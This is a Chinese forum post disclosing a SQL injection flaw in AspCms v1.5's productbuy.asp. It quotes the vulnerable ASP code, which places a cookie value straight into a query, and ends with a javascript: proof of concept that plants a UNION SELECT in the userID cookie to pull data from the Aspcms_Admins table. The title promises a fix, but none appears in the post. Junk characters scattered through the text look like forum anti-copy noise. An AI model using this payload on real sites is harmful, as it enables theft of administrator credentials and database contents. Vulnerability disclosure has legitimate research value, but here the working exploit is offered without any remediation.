AspCms_v1.5_20110517 SQL注射漏洞及修复

admin

好久没上土司了，上来一看发现在删号名单内.....
( I6 |4 G! e( L$ o0 J也没啥好发的，前些天路过某个小站，用的AspCms这个系统，搜索了下，productbuy.asp这个文件存在注射，但是目标已经修补....下载了代码，很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞，但是就在同一个文件下面找到了注射漏洞。。。。。。。
& R1 X# ~  W6 l) a4 t7 |废话不多说，看代码：

5 Y1 X/ A% s  p+ ]' B<%
6 n9 W4 y6 q/ ~3 d
if action = "buy" then

' n) N! P6 J! Y. m: q        addOrder()

else
7 L0 d: J* U2 R3 g5 L
        echoContent()
) q+ y5 @% V7 e( a& z
end if



7 T) C4 g8 B; ~* _6 F1 T……略过
. R$ j( B9 D& Y2 j# f1 e
5 j* ^) ~, B  a$ b! d

Sub echoContent()

        dim id
" Y. S$ C$ Q2 h3 m$ r
# `7 U- B6 T" S1 q- D) s        id=getForm("id","get")
0 G0 u$ v' e4 i4 s- B9 j7 i! A
        
& C# S$ \2 C( y) p
        if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品！","-1"

        
! G9 O. T& J( }, V' s# N$ [
        dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")

, Y& g& j2 s) _; X        dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
3 E  ]: a' _8 b8 s% a
. y; P3 _2 [! w4 c# J5 C        Dim templatePath,tempStr

        templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html"
. E3 H+ u$ C1 ~


1 v" ~9 z2 s& p        set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
. M) W, b+ p. G/ f7 V9 [2 O
        selectproduct=rsObj(0)
; z3 V7 A$ {- `. o
  A3 M6 E7 ]2 s7 K: P4 E5 I" t        

, @; }! V- z3 N6 T- W$ W        Dim linkman,gender,phone,mobile,email,qq,address,postcode
2 r; T& `  x; i# \4 c1 {
        if isnul(rCookie("loginstatus")) then  wCookie"loginstatus",0

3 c( n1 E1 u  n1 u* e% G) y* |        if rCookie("loginstatus")=1 then  
0 y* s6 C+ Q+ v0 u$ p' L+ b
* e: N- u; ~- ]+ H# h                set rsObj=conn.Exec("select *  from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")

                linkman=rsObj("truename")
2 |& z/ @+ c3 X- u/ u
7 k. z: b4 }' z                gender=rsObj("gender")
/ f+ n9 P6 Y/ |; F  o# w
                phone=rsObj("phone")

% ], E0 O: e/ @" G                mobile=rsObj("mobile")
. M. t/ }( ^4 D( E: W
                email=rsObj("email")

                qq=rsObj("qq")

                address=rsObj("address")

                postcode=rsObj("postcode")
0 W2 f! R+ \3 C6 s# ?& \& D7 l+ K
9 ~& J, E& n5 `# o" [        else

( y7 K  g  I- G% e* \; K                gender=1

        end if
3 ^1 x; C% e3 u! V+ y1 l
        rsObj.close()

% D- h/ b# ~3 }+ Z               
6 f, R- R: d( M8 F( C* `+ F0 @
; f% x5 D. D- z8 z. R) \        with templateObj

4 [0 ~4 `9 C! V! V8 d" S6 @& D                .content=loadFile(templatePath)        

                .parseHtml()
) X9 e4 _2 b6 B. _* v; Z
                .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
) w. N: f  A! h- I( V; ^. a9 S
                .content=replaceStr(.content,"[aspcms:linkman]",linkman)               
# _, P. D1 i# L- R5 T. \9 ?
                .content=replaceStr(.content,"[aspcms:gender]",gender)               

8 T, @$ V+ z5 d/ u                .content=replaceStr(.content,"[aspcms:phone]",phone)               

2 A5 D8 t/ B$ \. R                .content=replaceStr(.content,"[aspcms:mobile]",mobile)               

8 @2 K- x3 N( Z0 G6 O) l                .content=replaceStr(.content,"[aspcms:email]",email)                        
; R" [8 ?; p' `; I" C
" k% x! A% l3 \7 D' j  E, o4 W$ n                .content=replaceStr(.content,"[aspcms:qq]",qq)                        

+ c" U: K# \4 T                .content=replaceStr(.content,"[aspcms:address]",address)                        
- n- P: l+ N4 l$ A
6 B4 @4 @5 Z4 i( L                .content=replaceStr(.content,"[aspcms:postcode]",postcode)        

                .parseCommon()                 
3 N3 I( [: |+ h: r: W
                echo .content

        end with
& k' j& I1 ~% F& ?9 b2 p. d9 n
        set templateobj =nothing : terminateAllObjects
* W. B4 D9 Q! z' `2 V, h% f" y2 f
3 d  j; q! I5 c) O' b3 V( dEnd Sub
漏洞很明显，没啥好说的
: ]: g5 {% R& d  t7 e0 bpoc：

javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外，脚本板块没权限发帖子​